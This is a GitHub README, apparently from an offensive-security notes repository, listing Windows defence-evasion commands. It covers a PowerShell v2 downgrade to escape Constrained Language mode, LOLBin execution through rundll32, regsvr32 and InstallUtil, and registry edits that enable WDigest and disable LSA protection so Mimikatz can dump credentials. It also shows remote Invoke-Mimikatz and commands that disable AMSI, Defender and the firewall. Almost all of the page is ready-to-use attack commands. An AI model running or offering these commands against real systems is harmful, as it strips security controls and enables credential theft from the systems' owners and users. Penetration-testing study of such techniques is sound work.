Skip to content

Latest commit

 

History

History
 
 

L - Security Downgrade

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
README.md
README.md
 
 

README.md

This app has been blocked by your system administrator !!!

CHECK WHERE YOU CAN DROP YOUR BINARY

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

CHECK POWERSHELL LANGUAGE MODE

$ExecutionContext.SessionState.LanguageMode

POWERSHELL VERSION DOWNGRADE

# CHECK IF OLD VERSION STILL ACTIVATED
Get-WindowsOptionalFeature -Online -FeatureName MicrosoftWindowsPowerShellV2
# ABUSE
powershell.exe -version 2.0

Constrained Language mode was introduced with PowerShell 3.0 and can easily be bypassed by a hacker switching to an older version.

  • Can not run ps1 ?
    • Include you function inside the ps1 and exec .\script.ps1
    • rundll32.exe .\your.dll,Void
    • REGSVR32 "C:PATH\your.dll"
    • .NET C:\WINDOWS\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\PATH\Bypass.exe

CHANGE LANGUAGE MODE

  • POWERSHELL COMMAND

    $ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"
#Note : You can switch to different mode, but you can not change after a ConstrainedLanguage.

  • REGISTRY PATH

    HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
    • KEY
    __PSLockdownPolicy
    • POSSIBLE VALUES
    Data 1 : FullLanguage. 
Data 2 : RestrictedLanguage. 
Data 3 : NoLanguage. 
Data 4 : ConstrainedLanguage

  • SYSTEM ENVIRONNEMENT VARIABLE

    Control Pannel / System & Security / System
System Properties
Environment Variables
New
__PSLockDownPolicy
Value X

  • Group Policies

    User Configuration
Preferences
Windows Settings
Environment
Set you raviable __PSLockDownPolicy via GPO

MIMIKATZ ERROR kuhl_m_privilege_simple

# NEED SeDebugPrivilege
# Group Policy Management Editor -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment -> Debug programs -> Define these policy settings

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# ENEABLE WDigest
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

MIMIKATZ ERROR kuhl_m_sekurlsa_acquireLSA

# DISABLE LSA Protection
reg add HKLM\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0

MIMIKATZ ERROR kuhl_m_lsadump_secretsOrCache

# Computer Configuration -> Windows Settings -> Local Policy -> Security Options -> Interactive Logon: Number of previous logons to cache -> 10

Disable AMSI

# LOCAL
Set-MpPreference -DisableIOAVProtection $true
# Remote
$sess = New-PSSession -ComputerName websrv.domain.local
Invoke-command -ScriptBlock {Set-MpPreference -DisableIOAVProtection $true} -Session $sess
# REMOTE MIMIKATZ
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess

DISABLE WINDOWS DEFENDER

Set-MpPreference -DisableRealtimeMonitoring $true -Verbose

REMOVE WINDOWS DEFENDER

Uninstall-WindowsFeature -Name Windows-Defender

DISABLE FIREWALL

Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
Set-NetFirewallProfile -Profile * -Enabled True

<- BACK TO MAIN MENU ->